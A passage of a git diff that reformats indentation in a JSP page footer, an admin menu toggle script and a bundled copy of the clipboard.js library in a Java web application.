 		<fmt:message key="generic.text.commentMessage.2" /> 
 		<fmt:message key="generic.text.commentMessage.3" /> 
 		<fmt:message key="generic.text.commentMessage.4" /> -->
-<%
-    if (Analytics.googleAnalyticsOn) {
-%><%=Analytics.googleAnalyticsScript%>
-<%
-    }
-%>
+	<%
+		if (Analytics.googleAnalyticsOn) {
+	%><%=Analytics.googleAnalyticsScript%>
+	<%
+		}
+	%>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("login.jsp");
-        }
-    } else {
-        response.sendRedirect("login.jsp");
-    }
+	} else {
+			response.sendRedirect("login.jsp");
+		}
+	} else {
+		response.sendRedirect("login.jsp");
+	}
 %>
diff --git a/src/main/webapp/js/adminToggle.js b/src/main/webapp/js/adminToggle.js
index 499d7bfea..3ed3c67fd 100644
--- a/src/main/webapp/js/adminToggle.js
+++ b/src/main/webapp/js/adminToggle.js
@@ -1,36 +1,36 @@
 $("#adminList").click(function () {
-    $("#theAdminList").toggle("slow");
-    $("#theLessonList").hide("fast");
-    $("#theChallengeList").hide("fast");
-    $("#theUncompletedList").hide("fast");
-    $("#theCompletedList").hide("fast");
+	$("#theAdminList").toggle("slow");
+	$("#theLessonList").hide("fast");
+	$("#theChallengeList").hide("fast");
+	$("#theUncompletedList").hide("fast");
+	$("#theCompletedList").hide("fast");
 });
 
 $("#moduleManagementList").click(function () {
-    $("#theModuleManagementList").toggle("slow");
-    $("#theUserManagementList").hide("fast");
-    $("#theConfigurationList").hide("fast");
+	$("#theModuleManagementList").toggle("slow");
+	$("#theUserManagementList").hide("fast");
+	$("#theConfigurationList").hide("fast");
 });
 
 
 $("#userManagementList").click(function () {
-    $("#theUserManagementList").toggle("slow");
-    $("#theModuleManagementList").hide("fast");
-    $("#theConfigurationList").hide("fast");
+	$("#theUserManagementList").toggle("slow");
+	$("#theModuleManagementList").hide("fast");
+	$("#theConfigurationList").hide("fast");
 });
 
 $("#configurationList").click(function () {
-    $("#theConfigurationList").toggle("slow");
-    $("#theModuleManagementList").hide("fast");
-    $("#theUserManagementList").hide("fast");
+	$("#theConfigurationList").toggle("slow");
+	$("#theModuleManagementList").hide("fast");
+	$("#theUserManagementList").hide("fast");
 });
 
 $("#lessonManagementList").click(function () {
-    $("#theLessonManagmentList").toggle("slow");
-    $("#theChallengeManagementList").hide("fast");
+	$("#theLessonManagmentList").toggle("slow");
+	$("#theChallengeManagementList").hide("fast");
 });
 
 $("#challengeManagementList").click(function () {
-    $("#theChallengeManagementList").toggle("slow");
-    $("#theLessonManagmentList").hide("fast");
+	$("#theChallengeManagementList").toggle("slow");
+	$("#theLessonManagmentList").hide("fast");
 });
\ No newline at end of file
diff --git a/src/main/webapp/js/clipboard-js/clipboard-events.js b/src/main/webapp/js/clipboard-js/clipboard-events.js
index 796ffba68..1f7d1ceb5 100644
--- a/src/main/webapp/js/clipboard-js/clipboard-events.js
+++ b/src/main/webapp/js/clipboard-js/clipboard-events.js
@@ -1,22 +1,22 @@
 var clipboardDemos;
 
 function prepClipboardEvents() {
-    clipboardDemos = new Clipboard('[data-clipboard-shepherd]');
+	clipboardDemos = new Clipboard('[data-clipboard-shepherd]');
 
-    clipboardDemos.on('success', function (e) {
-        e.clearSelection();
-
-        console.info('Action:', e.action);
-        console.info('Text:', e.text);
-        console.info('Trigger:', e.trigger);
-
-        showTooltip(e.trigger, 'Copied!');
-    });
-
-    clipboardDemos.on('error', function (e) {
-        console.error('Action:', e.action);
-        console.error('Trigger:', e.trigger);
-
-        showTooltip(e.trigger, fallbackMessage(e.action));
-    });
+	clipboardDemos.on('success', function(e) {
+	    e.clearSelection();
+	
+	    console.info('Action:', e.action);
+	    console.info('Text:', e.text);
+	    console.info('Trigger:', e.trigger);
+	
+	    showTooltip(e.trigger, 'Copied!');
+	});
+	
+	clipboardDemos.on('error', function(e) {
+	    console.error('Action:', e.action);
+	    console.error('Trigger:', e.trigger);
+	
+	    showTooltip(e.trigger, fallbackMessage(e.action));
+	});
 }
\ No newline at end of file
diff --git a/src/main/webapp/js/clipboard-js/clipboard.js b/src/main/webapp/js/clipboard-js/clipboard.js
index 0c9dd1ae1..2f553defa 100644
--- a/src/main/webapp/js/clipboard-js/clipboard.js
+++ b/src/main/webapp/js/clipboard-js/clipboard.js
@@ -1,697 +1,614 @@
-(function (f) {
-    if (typeof exports === "object" && typeof module !== "undefined") {
-        module.exports = f()
-    } else if (typeof define === "function" && define.amd) {
-        define([], f)
-    } else {
-        var g;
-        if (typeof window !== "undefined") {
-            g = window
-        } else if (typeof global !== "undefined") {
-            g = global
-        } else if (typeof self !== "undefined") {
-            g = self
+(function(f){if(typeof exports==="object"&&typeof module!=="undefined"){module.exports=f()}else if(typeof define==="function"&&define.amd){define([],f)}else{var g;if(typeof window!=="undefined"){g=window}else if(typeof global!=="undefined"){g=global}else if(typeof self!=="undefined"){g=self}else{g=this}g.Clipboard = f()}})(function(){var define,module,exports;return (function e(t,n,r){function s(o,u){if(!n[o]){if(!t[o]){var a=typeof require=="function"&&require;if(!u&&a)return a(o,!0);if(i)return i(o,!0);var f=new Error("Cannot find module '"+o+"'");throw f.code="MODULE_NOT_FOUND",f}var l=n[o]={exports:{}};t[o][0].call(l.exports,function(e){var n=t[o][1][e];return s(n?n:e)},l,l.exports,e,t,n,r)}return n[o].exports}var i=typeof require=="function"&&require;for(var o=0;o<r.length;o++)s(r[o]);return s})({1:[function(require,module,exports){
+/**
+ * Module dependencies.
+ */
+
+var closest = require('closest')
+  , event = require('component-event');
+
+/**
+ * Delegate event `type` to `selector`
+ * and invoke `fn(e)`. A callback function
+ * is returned which may be passed to `.unbind()`.
+ *
+ * @param {Element} el
+ * @param {String} selector
+ * @param {String} type
+ * @param {Function} fn
+ * @param {Boolean} capture
+ * @return {Function}
+ * @api public
+ */
+
+// Some events don't bubble, so we want to bind to the capture phase instead
+// when delegating.
+var forceCaptureEvents = ['focus', 'blur'];
+
+exports.bind = function(el, selector, type, fn, capture){
+  if (forceCaptureEvents.indexOf(type) !== -1) capture = true;
+
+  return event.bind(el, type, function(e){
+    var target = e.target || e.srcElement;
+    e.delegateTarget = closest(target, selector, true, el);
+    if (e.delegateTarget) fn.call(el, e);
+  }, capture);
+};
+
+/**
+ * Unbind event `type`'s callback `fn`.
+ *
+ * @param {Element} el
+ * @param {String} type
+ * @param {Function} fn
+ * @param {Boolean} capture
+ * @api public
+ */
+
+exports.unbind = function(el, type, fn, capture){
+  if (forceCaptureEvents.indexOf(type) !== -1) capture = true;
+
+  event.unbind(el, type, fn, capture);
+};
+
+},{"closest":2,"component-event":4}],2:[function(require,module,exports){
+var matches = require('matches-selector')
+
+module.exports = function (element, selector, checkYoSelf) {
+  var parent = checkYoSelf ? element : element.parentNode
+
+  while (parent && parent !== document) {
+    if (matches(parent, selector)) return parent;
+    parent = parent.parentNode
+  }
+}
+
+},{"matches-selector":3}],3:[function(require,module,exports){
+
+/**
+ * Element prototype.
+ */
+
+var proto = Element.prototype;
+
+/**
+ * Vendor function.
+ */
+
+var vendor = proto.matchesSelector
+  || proto.webkitMatchesSelector
+  || proto.mozMatchesSelector
+  || proto.msMatchesSelector
+  || proto.oMatchesSelector;
+
+/**
+ * Expose `match()`.
+ */
+
+module.exports = match;
+
+/**
+ * Match `el` to `selector`.
+ *
+ * @param {Element} el
+ * @param {String} selector
+ * @return {Boolean}
+ * @api public
+ */
+
+function match(el, selector) {
+  if (vendor) return vendor.call(el, selector);
+  var nodes = el.parentNode.querySelectorAll(selector);
+  for (var i = 0; i < nodes.length; ++i) {
+    if (nodes[i] == el) return true;
+  }
+  return false;
+}
+},{}],4:[function(require,module,exports){
+var bind = window.addEventListener ? 'addEventListener' : 'attachEvent',
+    unbind = window.removeEventListener ? 'removeEventListener' : 'detachEvent',
+    prefix = bind !== 'addEventListener' ? 'on' : '';
+
+/**
+ * Bind `el` event `type` to `fn`.
+ *
+ * @param {Element} el
+ * @param {String} type
+ * @param {Function} fn
+ * @param {Boolean} capture
+ * @return {Function}
+ * @api public
+ */
+
+exports.bind = function(el, type, fn, capture){
+  el[bind](prefix + type, fn, capture || false);
+  return fn;
+};
+
+/**
+ * Unbind `el` event `type`'s callback `fn`.
+ *
+ * @param {Element} el
+ * @param {String} type
+ * @param {Function} fn
+ * @param {Boolean} capture
+ * @return {Function}
+ * @api public
+ */
+
+exports.unbind = function(el, type, fn, capture){
+  el[unbind](prefix + type, fn, capture || false);
+  return fn;
+};
+},{}],5:[function(require,module,exports){
+function E () {
+	// Keep this empty so it's easier to inherit from
+  // (via https://github.com/lipsmack from https://github.com/scottcorgan/tiny-emitter/issues/3)
+}
+
+E.prototype = {
+	on: function (name, callback, ctx) {
+    var e = this.e || (this.e = {});
+    
+    (e[name] || (e[name] = [])).push({
+      fn: callback,
+      ctx: ctx
+    });
+    
+    return this;
+  },
+
+  once: function (name, callback, ctx) {
+    var self = this;
+    var fn = function () {
+      self.off(name, fn);
+      callback.apply(ctx, arguments);
+    };
+    
+    return this.on(name, fn, ctx);
+  },
+
+  emit: function (name) {
+    var data = [].slice.call(arguments, 1);
+    var evtArr = ((this.e || (this.e = {}))[name] || []).slice();
+    var i = 0;
+    var len = evtArr.length;
+    
+    for (i; i < len; i++) {
+      evtArr[i].fn.apply(evtArr[i].ctx, data);
+    }
+    
+    return this;
+  },
+
+  off: function (name, callback) {
+    var e = this.e || (this.e = {});
+    var evts = e[name];
+    var liveEvents = [];
+    
+    if (evts && callback) {
+      for (var i = 0, len = evts.length; i < len; i++) {
+        if (evts[i].fn !== callback) liveEvents.push(evts[i]);
+      }
+    }
+    
+    // Remove event from queue to prevent memory leak
+    // Suggested by https://github.com/lazd
+    // Ref: https://github.com/scottcorgan/tiny-emitter/commit/c6ebfaa9bc973b33d110a84a307742b7cf94c953#commitcomment-5024910
+
+    (liveEvents.length) 
+      ? e[name] = liveEvents
+      : delete e[name];
+    
+    return this;
+  }
+};
+
+module.exports = E;
+
+},{}],6:[function(require,module,exports){
+/**
+ * Inner class which performs selection from either `text` or `target`
+ * properties and then executes copy or cut operations.
+ */
+'use strict';
+
+exports.__esModule = true;
+
+var _createClass = (function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ('value' in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; })();
+
+function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError('Cannot call a class as a function'); } }
+
+var ClipboardAction = (function () {
+    /**
+     * @param {Object} options
+     */
+
+    function ClipboardAction(options) {
+        _classCallCheck(this, ClipboardAction);
+
+        this.resolveOptions(options);
+        this.initSelection();
+    }
+
+    /**
+     * Defines base properties passed from constructor.
+     * @param {Object} options
+     */
+
+    ClipboardAction.prototype.resolveOptions = function resolveOptions() {
+        var options = arguments.length <= 0 || arguments[0] === undefined ? {} : arguments[0];
+
+        this.action = options.action;
+        this.emitter = options.emitter;
+        this.target = options.target;
+        this.text = options.text;
+        this.trigger = options.trigger;
+
+        this.selectedText = '';
+    };
+
+    /**
+     * Decides which selection strategy is going to be applied based
+     * on the existence of `text` and `target` properties.
+     */
+
+    ClipboardAction.prototype.initSelection = function initSelection() {
+        if (this.text && this.target) {
+            throw new Error('Multiple attributes declared, use either "target" or "text"');
+        } else if (this.text) {
+            this.selectFake();
+        } else if (this.target) {
+            this.selectTarget();
         } else {
-            g = this
+            throw new Error('Missing required attributes, use either "target" or "text"');
         }
-        g.Clipboard = f()
-    }
-})(function () {
-    var define, module, exports;
-    return (function e(t, n, r) {
-        function s(o, u) {
-            if (!n[o]) {
-                if (!t[o]) {
-                    var a = typeof require == "function" && require;
-                    if (!u && a) return a(o, !0);
-                    if (i) return i(o, !0);
-                    var f = new Error("Cannot find module '" + o + "'");
-                    throw f.code = "MODULE_NOT_FOUND", f
-                }
-                var l = n[o] = {exports: {}};
-                t[o][0].call(l.exports, function (e) {
-                    var n = t[o][1][e];
-                    return s(n ? n : e)
-                }, l, l.exports, e, t, n, r)
-            }
-            return n[o].exports
+    };
+
+    /**
+     * Creates a fake textarea element, sets its value from `text` property,
+     * and makes a selection on it.
+     */
+
+    ClipboardAction.prototype.selectFake = function selectFake() {
+        var _this = this;
+
+        this.removeFake();
+
+        this.fakeHandler = document.body.addEventListener('click', function () {
+            return _this.removeFake();
+        });
+
+        this.fakeElem = document.createElement('textarea');
+        this.fakeElem.style.position = 'absolute';
+        this.fakeElem.style.left = '-9999px';
+        this.fakeElem.style.top = (window.pageYOffset || document.documentElement.scrollTop) + 'px';
+        this.fakeElem.setAttribute('readonly', '');
+        this.fakeElem.value = this.text;
+        this.selectedText = this.text;
+
+        document.body.appendChild(this.fakeElem);
+
+        this.fakeElem.select();
+        this.copyText();
+    };
+
+    /**
+     * Only removes the fake element after another click event, that way
+     * an user can hit `Ctrl+C` to copy because selection still exists.
+     */
+
+    ClipboardAction.prototype.removeFake = function removeFake() {
+        if (this.fakeHandler) {
+            document.body.removeEventListener('click');
+            this.fakeHandler = null;
         }
 
-        var i = typeof require == "function" && require;
-        for (var o = 0; o < r.length; o++) s(r[o]);
-        return s
-    })({
-        1: [function (require, module, exports) {
-            /**
-             * Module dependencies.
-             */
-
-            var closest = require('closest')
-                , event = require('component-event');
-
-            /**
-             * Delegate event `type` to `selector`
-             * and invoke `fn(e)`. A callback function
-             * is returned which may be passed to `.unbind()`.
-             *
-             * @param {Element} el
-             * @param {String} selector
-             * @param {String} type
-             * @param {Function} fn
-             * @param {Boolean} capture
-             * @return {Function}
-             * @api public
-             */
+        if (this.fakeElem) {
+            document.body.removeChild(this.fakeElem);
+            this.fakeElem = null;
+        }
+    };
 
-// Some events don't bubble, so we want to bind to the capture phase instead
-// when delegating.
-            var forceCaptureEvents = ['focus', 'blur'];
-
-            exports.bind = function (el, selector, type, fn, capture) {
-                if (forceCaptureEvents.indexOf(type) !== -1) capture = true;
-
-                return event.bind(el, type, function (e) {
-                    var target = e.target || e.srcElement;
-                    e.delegateTarget = closest(target, selector, true, el);
-                    if (e.delegateTarget) fn.call(el, e);
-                }, capture);
-            };
-
-            /**
-             * Unbind event `type`'s callback `fn`.
-             *
-             * @param {Element} el
-             * @param {String} type
-             * @param {Function} fn
-             * @param {Boolean} capture
-             * @api public
-             */
-
-            exports.unbind = function (el, type, fn, capture) {
-                if (forceCaptureEvents.indexOf(type) !== -1) capture = true;
-
-                event.unbind(el, type, fn, capture);
-            };
-
-        }, {"closest": 2, "component-event": 4}], 2: [function (require, module, exports) {
-            var matches = require('matches-selector')
-
-            module.exports = function (element, selector, checkYoSelf) {
-                var parent = checkYoSelf ? element : element.parentNode
-
-                while (parent && parent !== document) {
-                    if (matches(parent, selector)) return parent;
-                    parent = parent.parentNode
-                }
-            }
+    /**
+     * Selects the content from element passed on `target` property.
+     */
 
-        }, {"matches-selector": 3}], 3: [function (require, module, exports) {
+    ClipboardAction.prototype.selectTarget = function selectTarget() {
+        if (this.target.nodeName === 'INPUT' || this.target.nodeName === 'TEXTAREA') {
+            this.target.select();
+            this.selectedText = this.target.value;
+        } else {
+            var range = document.createRange();
+            var selection = window.getSelection();
 
-            /**
-             * Element prototype.
-             */
+            range.selectNodeContents(this.target);
+            selection.addRange(range);
+            this.selectedText = selection.toString();
+        }
 
-            var proto = Element.prototype;
+        this.copyText();
+    };
 
-            /**
-             * Vendor function.
-             */
+    /**
+     * Executes the copy operation based on the current selection.
+     */
 
-            var vendor = proto.matchesSelector
-                || proto.webkitMatchesSelector
-                || proto.mozMatchesSelector
-                || proto.msMatchesSelector
-                || proto.oMatchesSelector;
+    ClipboardAction.prototype.copyText = function copyText() {
+        var succeeded = undefined;
 
-            /**
-             * Expose `match()`.
-             */
+        try {
+            succeeded = document.execCommand(this.action);
+        } catch (err) {
+            succeeded = false;
+        }
 
-            module.exports = match;
+        this.handleResult(succeeded);
+    };
+
+    /**
+     * Fires an event based on the copy operation result.
+     * @param {Boolean} succeeded
+     */
+
+    ClipboardAction.prototype.handleResult = function handleResult(succeeded) {
+        if (succeeded) {
+            this.emitter.emit('success', {
+                action: this.action,
+                text: this.selectedText,
+                trigger: this.trigger,
+                clearSelection: this.clearSelection.bind(this)
+            });
+        } else {
+            this.emitter.emit('error', {
+                action: this.action,
+                trigger: this.trigger,
+                clearSelection: this.clearSelection.bind(this)
+            });
+        }
+    };
 
-            /**
-             * Match `el` to `selector`.
-             *
-             * @param {Element} el
-             * @param {String} selector
-             * @return {Boolean}
-             * @api public
-             */
+    /**
+     * Removes current selection and focus from `target` element.
+     */
 
-            function match(el, selector) {
-                if (vendor) return vendor.call(el, selector);
-                var nodes = el.parentNode.querySelectorAll(selector);
-                for (var i = 0; i < nodes.length; ++i) {
-                    if (nodes[i] == el) return true;
-                }
-                return false;
-            }
-        }, {}], 4: [function (require, module, exports) {
-            var bind = window.addEventListener ? 'addEventListener' : 'attachEvent',
-                unbind = window.removeEventListener ? 'removeEventListener' : 'detachEvent',
-                prefix = bind !== 'addEventListener' ? 'on' : '';
-
-            /**
-             * Bind `el` event `type` to `fn`.
-             *
-             * @param {Element} el
-             * @param {String} type
-             * @param {Function} fn
-             * @param {Boolean} capture
-             * @return {Function}
-             * @api public
-             */
-
-            exports.bind = function (el, type, fn, capture) {
-                el[bind](prefix + type, fn, capture || false);
-                return fn;
-            };
-
-            /**
-             * Unbind `el` event `type`'s callback `fn`.
-             *
-             * @param {Element} el
-             * @param {String} type
-             * @param {Function} fn
-             * @param {Boolean} capture
-             * @return {Function}
-             * @api public
-             */
-
-            exports.unbind = function (el, type, fn, capture) {
-                el[unbind](prefix + type, fn, capture || false);
-                return fn;
-            };
-        }, {}], 5: [function (require, module, exports) {
-            function E() {
-                // Keep this empty so it's easier to inherit from
-                // (via https://github.com/lipsmack from https://github.com/scottcorgan/tiny-emitter/issues/3)
-            }
+    ClipboardAction.prototype.clearSelection = function clearSelection() {
+        if (this.target) {
+            this.target.blur();
+        }
 
-            E.prototype = {
-                on: function (name, callback, ctx) {
-                    var e = this.e || (this.e = {});
-
-                    (e[name] || (e[name] = [])).push({
-                        fn: callback,
-                        ctx: ctx
-                    });
-
-                    return this;
-                },
-
-                once: function (name, callback, ctx) {
-                    var self = this;
-                    var fn = function () {
-                        self.off(name, fn);
-                        callback.apply(ctx, arguments);
-                    };
-
-                    return this.on(name, fn, ctx);
-                },
-
-                emit: function (name) {
-                    var data = [].slice.call(arguments, 1);
-                    var evtArr = ((this.e || (this.e = {}))[name] || []).slice();
-                    var i = 0;
-                    var len = evtArr.length;
-
-                    for (i; i < len; i++) {
-                        evtArr[i].fn.apply(evtArr[i].ctx, data);
-                    }
-
-                    return this;
-                },
-
-                off: function (name, callback) {
-                    var e = this.e || (this.e = {});
-                    var evts = e[name];
-                    var liveEvents = [];
-
-                    if (evts && callback) {
-                        for (var i = 0, len = evts.length; i < len; i++) {
-                            if (evts[i].fn !== callback) liveEvents.push(evts[i]);
-                        }
-                    }
-
-                    // Remove event from queue to prevent memory leak
-                    // Suggested by https://github.com/lazd
-                    // Ref: https://github.com/scottcorgan/tiny-emitter/commit/c6ebfaa9bc973b33d110a84a307742b7cf94c953#commitcomment-5024910
-
-                    (liveEvents.length)
-                        ? e[name] = liveEvents
-                        : delete e[name];
-
-                    return this;
-                }
-            };
-
-            module.exports = E;
-
-        }, {}], 6: [function (require, module, exports) {
-            /**
-             * Inner class which performs selection from either `text` or `target`
-             * properties and then executes copy or cut operations.
-             */
-            'use strict';
-
-            exports.__esModule = true;
-
-            var _createClass = (function () {
-                function defineProperties(target, props) {
-                    for (var i = 0; i < props.length; i++) {
-                        var descriptor = props[i];
-                        descriptor.enumerable = descriptor.enumerable || false;
-                        descriptor.configurable = true;
-                        if ('value' in descriptor) descriptor.writable = true;
-                        Object.defineProperty(target, descriptor.key, descriptor);
-                    }
-                }
+        window.getSelection().removeAllRanges();
+    };
 
-                return function (Constructor, protoProps, staticProps) {
-                    if (protoProps) defineProperties(Constructor.prototype, protoProps);
-                    if (staticProps) defineProperties(Constructor, staticProps);
-                    return Constructor;
-                };
-            })();
+    /**
+     * Sets the `action` to be performed which can be either 'copy' or 'cut'.
+     * @param {String} action
+     */
 
-            function _classCallCheck(instance, Constructor) {
-                if (!(instance instanceof Constructor)) {
-                    throw new TypeError('Cannot call a class as a function');
-                }
-            }
+    /**
+     * Destroy lifecycle.
+     */
 
-            var ClipboardAction = (function () {
-                /**
-                 * @param {Object} options
-                 */
+    ClipboardAction.prototype.destroy = function destroy() {
+        this.removeFake();
+    };
 
-                function ClipboardAction(options) {
-                    _classCallCheck(this, ClipboardAction);
+    _createClass(ClipboardAction, [{
+        key: 'action',
+        set: function set() {
+            var action = arguments.length <= 0 || arguments[0] === undefined ? 'copy' : arguments[0];
 
-                    this.resolveOptions(options);
-                    this.initSelection();
-                }
+            this._action = action;
 
-                /**
-                 * Defines base properties passed from constructor.
-                 * @param {Object} options
-                 */
-
-                ClipboardAction.prototype.resolveOptions = function resolveOptions() {
-                    var options = arguments.length <= 0 || arguments[0] === undefined ? {} : arguments[0];
-
-                    this.action = options.action;
-                    this.emitter = options.emitter;
-                    this.target = options.target;
-                    this.text = options.text;
-                    this.trigger = options.trigger;
-
-                    this.selectedText = '';
-                };
-
-                /**
-                 * Decides which selection strategy is going to be applied based
-                 * on the existence of `text` and `target` properties.
-                 */
-
-                ClipboardAction.prototype.initSelection = function initSelection() {
-                    if (this.text && this.target) {
-                        throw new Error('Multiple attributes declared, use either "target" or "text"');
-                    } else if (this.text) {
-                        this.selectFake();
-                    } else if (this.target) {
-                        this.selectTarget();
-                    } else {
-                        throw new Error('Missing required attributes, use either "target" or "text"');
-                    }
-                };
-
-                /**
-                 * Creates a fake textarea element, sets its value from `text` property,
-                 * and makes a selection on it.
-                 */
-
-                ClipboardAction.prototype.selectFake = function selectFake() {
-                    var _this = this;
-
-                    this.removeFake();
-
-                    this.fakeHandler = document.body.addEventListener('click', function () {
-                        return _this.removeFake();
-                    });
-
-                    this.fakeElem = document.createElement('textarea');
-                    this.fakeElem.style.position = 'absolute';
-                    this.fakeElem.style.left = '-9999px';
-                    this.fakeElem.style.top = (window.pageYOffset || document.documentElement.scrollTop) + 'px';
-                    this.fakeElem.setAttribute('readonly', '');
-                    this.fakeElem.value = this.text;
-                    this.selectedText = this.text;
-
-                    document.body.appendChild(this.fakeElem);
-
-                    this.fakeElem.select();
-                    this.copyText();
-                };
-
-                /**
-                 * Only removes the fake element after another click event, that way
-                 * an user can hit `Ctrl+C` to copy because selection still exists.
-                 */
-
-                ClipboardAction.prototype.removeFake = function removeFake() {
-                    if (this.fakeHandler) {
-                        document.body.removeEventListener('click');
-                        this.fakeHandler = null;
-                    }
-
-                    if (this.fakeElem) {
-                        document.body.removeChild(this.fakeElem);
-                        this.fakeElem = null;
-                    }
-                };
-
-                /**
-                 * Selects the content from element passed on `target` property.
-                 */
-
-                ClipboardAction.prototype.selectTarget = function selectTarget() {
-                    if (this.target.nodeName === 'INPUT' || this.target.nodeName === 'TEXTAREA') {
-                        this.target.select();
-                        this.selectedText = this.target.value;
-                    } else {
-                        var range = document.createRange();
-                        var selection = window.getSelection();
-
-                        range.selectNodeContents(this.target);
-                        selection.addRange(range);
-                        this.selectedText = selection.toString();
-                    }
-
-                    this.copyText();
-                };
-
-                /**
-                 * Executes the copy operation based on the current selection.
-                 */
-
-                ClipboardAction.prototype.copyText = function copyText() {
-                    var succeeded = undefined;
-
-                    try {
-                        succeeded = document.execCommand(this.action);
-                    } catch (err) {
-                        succeeded = false;
-                    }
-
-                    this.handleResult(succeeded);
-                };
-
-                /**
-                 * Fires an event based on the copy operation result.
-                 * @param {Boolean} succeeded
-                 */
-
-                ClipboardAction.prototype.handleResult = function handleResult(succeeded) {
-                    if (succeeded) {
-                        this.emitter.emit('success', {
-                            action: this.action,
-                            text: this.selectedText,
-                            trigger: this.trigger,
-                            clearSelection: this.clearSelection.bind(this)
-                        });
-                    } else {
-                        this.emitter.emit('error', {
-                            action: this.action,
-                            trigger: this.trigger,
-                            clearSelection: this.clearSelection.bind(this)
-                        });
-                    }
-                };
-
-                /**
-                 * Removes current selection and focus from `target` element.
-                 */
-
-                ClipboardAction.prototype.clearSelection = function clearSelection() {
-                    if (this.target) {
-                        this.target.blur();
-                    }
-
-                    window.getSelection().removeAllRanges();
-                };
-
-                /**
-                 * Sets the `action` to be performed which can be either 'copy' or 'cut'.
-                 * @param {String} action
-                 */
-
-                /**
-                 * Destroy lifecycle.
-                 */
-
-                ClipboardAction.prototype.destroy = function destroy() {
-                    this.removeFake();
-                };
-
-                _createClass(ClipboardAction, [{
-                    key: 'action',
-                    set: function set() {
-                        var action = arguments.length <= 0 || arguments[0] === undefined ? 'copy' : arguments[0];
-
-                        this._action = action;
-
-                        if (this._action !== 'copy' && this._action !== 'cut') {
-                            throw new Error('Invalid "action" value, use either "copy" or "cut"');
-                        }
-                    },
-
-                    /**
-                     * Gets the `action` property.
-                     * @return {String}
-                     */
-                    get: function get() {
-                        return this._action;
-                    }
-
-                    /**
-                     * Sets the `target` property using an element
-                     * that will be have its content copied.
-                     * @param {Element} target
-                     */
-                }, {
-                    key: 'target',
-                    set: function set(target) {
-                        if (target !== undefined) {
-                            if (target && typeof target === 'object' && target.nodeType === 1) {
-                                this._target = target;
-                            } else {
-                                throw new Error('Invalid "target" value, use a valid Element');
-                            }
-                        }
-                    },
-
-                    /**
-                     * Gets the `target` property.
-                     * @return {String|HTMLElement}
-                     */
-                    get: function get() {
-                        return this._target;
-                    }
-                }]);
-
-                return ClipboardAction;
-            })();
-
-            exports['default'] = ClipboardAction;
-            module.exports = exports['default'];
-
-        }, {}], 7: [function (require, module, exports) {
-            'use strict';
-
-            exports.__esModule = true;
-
-            function _interopRequireDefault(obj) {
-                return obj && obj.__esModule ? obj : {'default': obj};
+            if (this._action !== 'copy' && this._action !== 'cut') {
+                throw new Error('Invalid "action" value, use either "copy" or "cut"');
             }
+        },
+
+        /**
+         * Gets the `action` property.
+         * @return {String}
+         */
+        get: function get() {
+            return this._action;
+        }
 
-            function _classCallCheck(instance, Constructor) {
-                if (!(instance instanceof Constructor)) {
-                    throw new TypeError('Cannot call a class as a function');
+        /**
+         * Sets the `target` property using an element
+         * that will be have its content copied.
+         * @param {Element} target
+         */
+    }, {
+        key: 'target',
+        set: function set(target) {
+            if (target !== undefined) {
+                if (target && typeof target === 'object' && target.nodeType === 1) {
+                    this._target = target;
+                } else {
+                    throw new Error('Invalid "target" value, use a valid Element');
                 }
             }
+        },
+
+        /**
+         * Gets the `target` property.
+         * @return {String|HTMLElement}
+         */
+        get: function get() {
+            return this._target;
+        }
+    }]);
 
-            function _inherits(subClass, superClass) {
-                if (typeof superClass !== 'function' && superClass !== null) {
-                    throw new TypeError('Super expression must either be null or a function, not ' + typeof superClass);
-                }
-                subClass.prototype = Object.create(superClass && superClass.prototype, {
-                    constructor: {
-                        value: subClass,
-                        enumerable: false,
-                        writable: true,
-                        configurable: true
-                    }
-                });
-                if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass;
-            }
+    return ClipboardAction;
+})();
 
-            var _clipboardAction = require('./clipboard-action');
+exports['default'] = ClipboardAction;
+module.exports = exports['default'];
 
-            var _clipboardAction2 = _interopRequireDefault(_clipboardAction);
+},{}],7:[function(require,module,exports){
+'use strict';
 
-            var _delegateEvents = require('delegate-events');
+exports.__esModule = true;
 
-            var _delegateEvents2 = _interopRequireDefault(_delegateEvents);
+function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { 'default': obj }; }
 
-            var _tinyEmitter = require('tiny-emitter');
+function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError('Cannot call a class as a function'); } }
 
-            var _tinyEmitter2 = _interopRequireDefault(_tinyEmitter);
+function _inherits(subClass, superClass) { if (typeof superClass !== 'function' && superClass !== null) { throw new TypeError('Super expression must either be null or a function, not ' + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }
 
-            /**
-             * Base class which takes a selector, delegates a click event to it,
-             * and instantiates a new `ClipboardAction` on each click.
-             */
+var _clipboardAction = require('./clipboard-action');
 
-            var Clipboard = (function (_Emitter) {
-                _inherits(Clipboard, _Emitter);
+var _clipboardAction2 = _interopRequireDefault(_clipboardAction);
 
-                /**
-                 * @param {String} selector
-                 * @param {Object} options
-                 */
+var _delegateEvents = require('delegate-events');
 
-                function Clipboard(selector, options) {
-                    _classCallCheck(this, Clipboard);
+var _delegateEvents2 = _interopRequireDefault(_delegateEvents);
 
-                    _Emitter.call(this);
+var _tinyEmitter = require('tiny-emitter');
 
-                    this.resolveOptions(options);
-                    this.delegateClick(selector);
-                }
+var _tinyEmitter2 = _interopRequireDefault(_tinyEmitter);
 
-                /**
-                 * Helper function to retrieve attribute value.
-                 * @param {String} suffix
-                 * @param {Element} element
-                 */
-
-                /**
-                 * Defines if attributes would be resolved using internal setter functions
-                 * or custom functions that were passed in the constructor.
-                 * @param {Object} options
-                 */
-
-                Clipboard.prototype.resolveOptions = function resolveOptions() {
-                    var options = arguments.length <= 0 || arguments[0] === undefined ? {} : arguments[0];
-
-                    this.action = typeof options.action === 'function' ? options.action : this.defaultAction;
-                    this.target = typeof options.target === 'function' ? options.target : this.defaultTarget;
-                    this.text = typeof options.text === 'function' ? options.text : this.defaultText;
-                };
